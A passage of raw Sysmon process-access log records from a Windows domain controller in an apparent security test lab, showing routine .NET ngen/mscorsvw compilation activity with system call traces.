Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.633{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E901-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.617{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E901-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.617{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E901-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E801-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.539{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E801-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.539{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E801-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.492{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E701-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.476{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E701-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.476{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E701-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E601-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.398{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E601-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.398{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E601-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.351{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E501-000000009A01}3024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.351{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E501-000000009A01}3024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.351{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E501-000000009A01}3024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.304{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E401-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.289{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E401-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.289{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E401-000000009A01}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.273{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E301-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.258{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E301-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.258{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E301-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456C-6000-E201-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.211{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-456C-6000-E201-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:48.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456C-6000-E201-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windo